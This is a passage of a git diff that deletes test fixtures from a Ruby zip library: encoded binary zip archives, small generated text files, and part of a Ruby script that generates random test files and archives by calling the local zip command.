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

diff --git a/lib/zip/test/data/generated/randomAscii1.txt b/lib/zip/test/data/generated/randomAscii1.txt
deleted file mode 100644
index b2b472a203..0000000000
--- a/lib/zip/test/data/generated/randomAscii1.txt
+++ /dev/null
@@ -1 +0,0 @@
-0.040244959211864
\ No newline at end of file
diff --git a/lib/zip/test/data/generated/randomAscii2.txt b/lib/zip/test/data/generated/randomAscii2.txt
deleted file mode 100644
index 64dc85e2c4..0000000000
--- a/lib/zip/test/data/generated/randomAscii2.txt
+++ /dev/null
@@ -1 +0,0 @@
-0.917381580665493
\ No newline at end of file
diff --git a/lib/zip/test/data/generated/randomAscii3.txt b/lib/zip/test/data/generated/randomAscii3.txt
deleted file mode 100644
index c7f3a83bff..0000000000
--- a/lib/zip/test/data/generated/randomAscii3.txt
+++ /dev/null
@@ -1 +0,0 @@
-0.670572209005379
\ No newline at end of file
diff --git a/lib/zip/test/data/generated/randomBinary1.bin b/lib/zip/test/data/generated/randomBinary1.bin
deleted file mode 100644
index 593f4708db84ac8fd0f5cc47c634f38c013fe9e4..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 4
LcmZQzU|;|M00aO5

diff --git a/lib/zip/test/data/generated/randomBinary2.bin b/lib/zip/test/data/generated/randomBinary2.bin
deleted file mode 100644
index 593f4708db84ac8fd0f5cc47c634f38c013fe9e4..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 4
LcmZQzU|;|M00aO5

diff --git a/lib/zip/test/data/generated/short.txt b/lib/zip/test/data/generated/short.txt
deleted file mode 100644
index 1c5f8ba2db..0000000000
--- a/lib/zip/test/data/generated/short.txt
+++ /dev/null
@@ -1 +0,0 @@
-ABCDEF
\ No newline at end of file
diff --git a/lib/zip/test/data/generated/test1.zip b/lib/zip/test/data/generated/test1.zip
deleted file mode 100644
index 2ce05cedf4447ad8f301d2e157d699fdd9a85ad6..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 646
zcmWIWW@Zs#U|`^2kTH<3-1D|^`4vV627Oir20jKEhLpsTME$hPoK!=-l8Tbh5Kac>
zbo-4SV$6a*r4`%^j4Ush85qDsYskgC*#;uD_x^TioAS>#`_bSz_1LT}PK$k6R!(Wp
zJYl#jqBKWDy7cb#^AA{fxM$Aaas0W=J6kh{FMDF`-R#4DR&DOR?k{=oQFjhQ*zR1Z
zr>8A$M;$T9J!HR!ZO84m?<T)c+<o)`tAm!_){~QeR7)-WxJs0J-*%UEB_0glVxG+|
z`8&a_|K>@x?YrMK-d;Y5+c@NwjHKm(UT3d^TOAwj8LC%qtMhxm>-!td+PmhdC;Jjx
z%ch2OPPk^ux4K!2{|9G9;npK_RvmUc*?0fi8}rny54~QUD`g7(92aAtcJ|}nD`x_}
z&n;>Gx%XUE>5;6M-_Mj+{MtW#nTywSiTuUojkhJN_j8)qD^Fjl(6+Ti{mZN1?avRt
zm7e?6O4xSc>xI*+E_{`oEBd<i`7WtIEw?VkzuIxKAJ@n}RcGnRTUoBpzM+==z>8J>
zm33ZnS9z;DZB&XEMdzH_JVE)+gULp7j7&rg|Fw6<EDm8SJ-foTBuwF=go+~Dp};jJ
zdK0B<lz(wgI<|tjGWEwYslXC1y_FeU*MineNjR9L#;x|U+QL&U((UxqFZ&Jno-!?c
zdt~+ptHa$n(>M&Q9K1fhws-%P_|Y)(tzF^=$>y`QN#@4eI~${F4j<KT*dO4{$Rx*%
rD|JW!Qw;+HFtIQ!X#}y*(+Vpjt)Qio0B=?{kZMLC3<1(IOduWr1hWhp

diff --git a/lib/zip/test/data/generated/zipWithDir.zip b/lib/zip/test/data/generated/zipWithDir.zip
deleted file mode 100644
index 476120bff1c8f03d8bd65c9cafd90979a7d6042b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 830
zcmWIWW@Zs#U|`^2kTH<3-1D|^`4vV627Oir20jKEhLpsTME$hPoK!=-l8Tbh5Kac>
zbo-4SV$6a*r4`%^j4Ush85qDsYskgC*#;uD_x^TioAS>#`_bSz_1LT}PK$k6R!(Wp
zJYl#jqBKWDy7cb#^AA{fxM$Aaas0W=J6kh{FMDF`-R#4DR&DOR?k{=oQFjhQ*zR1Z
zr>8A$M;$T9J!HR!ZO84m?<T)c+<o)`tAm!_){~QeR7)-WxJs0J-*%UEB_0glVxG+|
z`8&a_|K>@x?YrMK-d;Y5+c@NwjHKm(UT3d^TOAwj8LC%qtMhxm>-!td+PmhdC;Jjx
z%ch2OPPk^ux4K!2{|9G9;npK_RvmUc*?0fi8}rny54~QUD`g7(92aAtcJ|}nD`x_}
z&n;>Gx%XUE>5;6M-_Mj+{MtW#nTywSiTuUojkhJN_j8)qD^Fjl(6+Ti{mZN1?avRt
zm7e?6O4xSc>xI*+E_{`oEBd<i`7WtIEw?VkzuIxKAJ@n}RcGnRTUoBpzM+==z>8J>
zm33ZnS9z;DZB&XEMdzH_JVE)+gULp7j7&rg|Fw6<EDm8SJ-foTBuwF=go+~Dp};jJ
zdK0B<lz(wgI<|tjGWEwYslXC1y_FeU*MineNjR9L#;x|U+QL&U((UxqFZ&Jno-!?c
zdt~+ptHa$n(>M&Q9K1fhws-%P_|Y)(tzF^=$>y`QN#@4eI~${F4j<KT*dG8)8(hG&
z!NAZEddddOfD$sWw2_{gms*rqlA5BQnp;p(S&~{@l9E}Z4^Al#9D+U|jFwUYycwC~
zm~o{!39t>oB*?I&5yV7Kfvk`eh}BG7ZiSf1z#zcz)=`EDY9>yX18u<SYF0LodzgT5
M8;~vnn!~^V0L-W|(f|Me

diff --git a/lib/zip/test/data/notzippedruby.rb b/lib/zip/test/data/notzippedruby.rb
deleted file mode 100755
index 036d25e92c..0000000000
--- a/lib/zip/test/data/notzippedruby.rb
+++ /dev/null
@@ -1,7 +0,0 @@
-#!/usr/bin/env ruby
-
-class NotZippedRuby
-  def returnTrue
-    true
-  end
-end
diff --git a/lib/zip/test/data/rubycode.zip b/lib/zip/test/data/rubycode.zip
deleted file mode 100644
index 8a68560e638088df79cd3bf68973013e5421a138..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 617
zcmWIWW@Zs#U|`^2*ef_ihj&#AyDyLz4#a#6q6}4;1qG=oMWsoVhI&Owp&^_M%*Qqz
zusOT^fK6xx3qz{5pk{E`6@6X3Oa7<MT=qY!9ju|{yXwi)M^C-ZdFtqeb)3@C@bKki
z>XQ6aq^YrF$udom<<FM96kR%PirCXuk*Uj?T0}*>7Oc6lM<h<qfRP~p?wZ{|*Ze-a
zNXifBl1L2K7{Od~kUZCX#B|M0)n_8hn~sQzTuL~D>6}=RDLT(4ef%v0bc!4h^8y1W
zF(|b-zqBYhRj;I?1ROS-fZ>81HlI)HpFDBKJKSTf$2lEFL!-|k4N6D3GG|(@>;ig~
zkx85xSJ3kU?O<SF1md@iAQpN=utFjtw1NS}Ak0uhHmDE9AV?Sj4FZKBx<Q!!MHsZC
fQ5NVhG~WZw0r?(c4l5hT&CEb}3rJUjyuknfcKNwt

diff --git a/lib/zip/test/data/rubycode2.zip b/lib/zip/test/data/rubycode2.zip
deleted file mode 100644
index 8e1cd08f2d095bd44cece2028bfbe30139c71887..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 261
zcmWIWW@Zs#U|`^2;1Hdnv!J_DBo)YO0%AS}QHH9_f`ZhPqSB;FW4)rJ&=5`r=Jz`e
z*s$z8U=v!w!jP&hs2Ln~MPFC%lK-hQm;KLb2Wx2gu6pwH(NnK;o;rGA9jA0OJbXEs
zx+FgrX=*H4vP@HC`LiW2pH6!=B}ME>NSo@jDa*vNRhlwoTaWDdGpXl_l7YYQ5=Tcy
zrKJm6mDneFo%MeBlu4K&z?+dtoEeupd4aBFU|<B|w~Zhcx~o|st`4nW02;)~22#QZ
Mgq}cp8HmFG01enrYybcN

diff --git a/lib/zip/test/data/testDirectory.bin b/lib/zip/test/data/testDirectory.bin
deleted file mode 100644
index cbdb9f7d74abf2a692255c3fb8c4496aab2b6d73..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 303
zcmWIWW@Hj)7GYpu;9z*UR7Gb_<;6cI_!t;|&1Yob1ws&D1mZ1?AXZL(Ub<s(a%QGp
zNkvI$2rC2gQ8qK1&<X~I0I)e+AVpwvzzitC2{i}A-O|Xx&%ltHTToI-(2UG~WxLsc
zdO#Rv2E;8cKr@On@{3Avn1S$5WbG}1{UVGE5l;LJd?@~D1DXNyk5gt|Vo{}DQf3~S
Thgd=OGOz%lB+%A26_C{c*#0_<

diff --git a/lib/zip/test/data/zipWithDirs.zip b/lib/zip/test/data/zipWithDirs.zip
deleted file mode 100644
index 4b01f011ae1ad84014131d7049e968ff7d73c2f0..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1934
zcmWIWW@h1H0D-eDzjVM1D8b4g%8-&-WT+n+!pXq=D9+LLFA#@TurPdK{K6Q3Qy(`>
zA4oGE-6BAHIKZ|xRwx*G19_o9EQG2%Ei)(8(9jU>1duaeP7pnEkh8&nhxJ1B@*nf6
zHmC3$*O)cQq4xsI(%Y*)R4Bgs(PD5T$>)hP`&4@^Uu)sOHmP%+3H(<!cHi5xWDDyO
zE4|mkqP_AZrr%8Wf_#H;&&NY&Bt3v`@dIMGZy+wg>JZ*Tj$A;8upFq4-#D)-_!rOo
zz!GmJQzzjm|Ki#?1CQIcEI2yj#PYsPrf+proq4ajTwpGhS;Rkm%D0A)<GHnq7JYOL
zU%dV$GpZ|Ew}u8|cZCr#uJ|HuxA?_0maG;vjlX;OgctSIb2xU}P4IvFI%sR*U85@n
zyezf>zZ8EJcxCc?6yCYU#-$Z+V)|>29qyQgrU)ZKDMG0hH6=mA&`2McB8;FZB0rGW
z^aM>2Fx?<CV1{5zl!$0-nW)p|4~)WCAeMq8D>OquacTrK4QqJHwn1X`eeKbzSH2tf
ze~@$y7Fr=VYr&WAVTm&&(+zp%a4xxL^+-`ycmB2e%C1^V4FwljSkE~#@%Fi*%OZ!K
zJ;>Ryr7T6HD!}#Rvky$Dk$dY_U<O*`8tH?bgWWM`N$ib&joZbk7?I2WHq~<L#x;^z
zJJ_1!R@92uS}X-6^t^0lQFTP*B0@+reeGEnVCaBc0*YL48pj$KsP+rjw4LYJq}n(O
zlEgi?9<ZOf;Cal7vsV3F#do+*dYssEMJ{jY9L}i+KI~J-sJVDnvic`OfHxzPI5V!o
zh8O4t5D;K^>j<KuMGq^a=n1W0z^k8|0a?EVOh2p$!Y~C92B?J(#1uxL{)WafR8t@Y
z05E#+7=~JMARER8G!yJ4h%tCgLCyKdru3kg0xSnG+(Jz73NeA*0?NlY^ke2=<lyy!
z=?CRSP<{rQ0?N;XB1s4(k~&aL0ht9e3{uL&VjK}ys5u%rV9sJS44k3B`5VKZ2t!e`
tBC?^G%+PQGn}a{*QL_@VDer-%fFm6(v{~7J=?hrD0Fy3IMK%kF2LR;H04M+e

diff --git a/lib/zip/test/gentestfiles.rb b/lib/zip/test/gentestfiles.rb
deleted file mode 100755
index 45116ec5b5..0000000000
--- a/lib/zip/test/gentestfiles.rb
+++ /dev/null
@@ -1,160 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-class TestFiles
-  RANDOM_ASCII_FILE1  = "data/generated/randomAscii1.txt"
-  RANDOM_ASCII_FILE2  = "data/generated/randomAscii2.txt"
-  RANDOM_ASCII_FILE3  = "data/generated/randomAscii3.txt"
-  RANDOM_BINARY_FILE1 = "data/generated/randomBinary1.bin"
-  RANDOM_BINARY_FILE2 = "data/generated/randomBinary2.bin"
-
-  EMPTY_TEST_DIR      = "data/generated/emptytestdir"
-
-  ASCII_TEST_FILES  = [ RANDOM_ASCII_FILE1, RANDOM_ASCII_FILE2, RANDOM_ASCII_FILE3 ] 
-  BINARY_TEST_FILES = [ RANDOM_BINARY_FILE1, RANDOM_BINARY_FILE2 ]
-  TEST_DIRECTORIES  = [ EMPTY_TEST_DIR ]
-  TEST_FILES        = [ ASCII_TEST_FILES, BINARY_TEST_FILES, EMPTY_TEST_DIR ].flatten!
-
-  def TestFiles.create_test_files(recreate)
-    if (recreate || 
-  ! (TEST_FILES.inject(true) { |accum, element| accum && File.exists?(element) }))
-      
-      Dir.mkdir "data/generated" rescue Errno::EEXIST
-
-      ASCII_TEST_FILES.each_with_index { 
-  |filename, index| 
-  create_random_ascii(filename, 1E4 * (index+1))
-      }
-      
-      BINARY_TEST_FILES.each_with_index { 
-  |filename, index| 
-  create_random_binary(filename, 1E4 * (index+1))
-      }
-
-      ensure_dir(EMPTY_TEST_DIR)
-    end
-  end
-
-  private
-  def TestFiles.create_random_ascii(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << rand
-      end
-    }
-  end
-
-  def TestFiles.create_random_binary(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << [rand].pack("V")
-      end
-    }
-  end
-
-  def TestFiles.ensure_dir(name) 
-    if File.exists?(name)
-      return if File.stat(name).directory?
-      File.delete(name)
-    end
-    Dir.mkdir(name)
-  end
-
-end
-
-
-
-# For representation and creation of
-# test data
-class TestZipFile
-  attr_accessor :zip_name, :entry_names, :comment
-
-  def initialize(zip_name, entry_names, comment = "")
-    @zip_name=zip_name
-    @entry_names=entry_names
-  if "".respond_to? :force_encoding
-    @entry_names.each {|name| name.force_encoding("ASCII-8BIT")}
-  end
-    @comment = comment
-  end
-
-  def TestZipFile.create_test_zips(recreate)
-    files = Dir.entries("data/generated")
-    if (recreate || 
-      ! (files.index(File.basename(TEST_ZIP1.zip_name)) &&
-         files.index(File.basename(TEST_ZIP2.zip_name)) &&
-         files.index(File.basename(TEST_ZIP3.zip_name)) &&
-         files.index(File.basename(TEST_ZIP4.zip_name)) &&
-         files.index("empty.txt")      &&
-         files.index("empty_chmod640.txt")      &&
-         files.index("short.txt")      &&
-         files.index("longAscii.txt")  &&
-         files.index("longBinary.bin") ))
-      raise "failed to create test zip '#{TEST_ZIP1.zip_name}'" unless 
-  system("zip #{TEST_ZIP1.zip_name} data/file2.txt")
-      raise "failed to remove entry from '#{TEST_ZIP1.zip_name}'" unless 
-  system("zip #{TEST_ZIP1.zip_name} -d data/file2.txt")
-      
-      File.open("data/generated/empty.txt", "w") {}
-      File.open("data/generated/empty_chmod640.txt", "w") { |f| f.chmod(0640) }
-      
-      File.open("data/generated/short.txt", "w") { |file| file << "ABCDEF" }
-      ziptestTxt=""
-      File.open("data/file2.txt") { |file| ziptestTxt=file.read }
-      File.open("data/generated/longAscii.txt", "w") {
-  |file|
-  while (file.tell < 1E5)
-    file << ziptestTxt
-  end
-      }
-      
-      testBinaryPattern=""
-      File.open("data/generated/empty.zip") { |file| testBinaryPattern=file.read }
-      testBinaryPattern *= 4
-      
-      File.open("data/generated/longBinary.bin", "wb") {
-  |file|
-  while (file.tell < 3E5)
-    file << testBinaryPattern << rand << "\0"
-  end
-      }
-      raise "failed to create test zip '#{TEST_ZIP2.zip_name}'" unless 
-  system("zip #{TEST_ZIP2.zip_name} #{TEST_ZIP2.entry_names.join(' ')}")
-
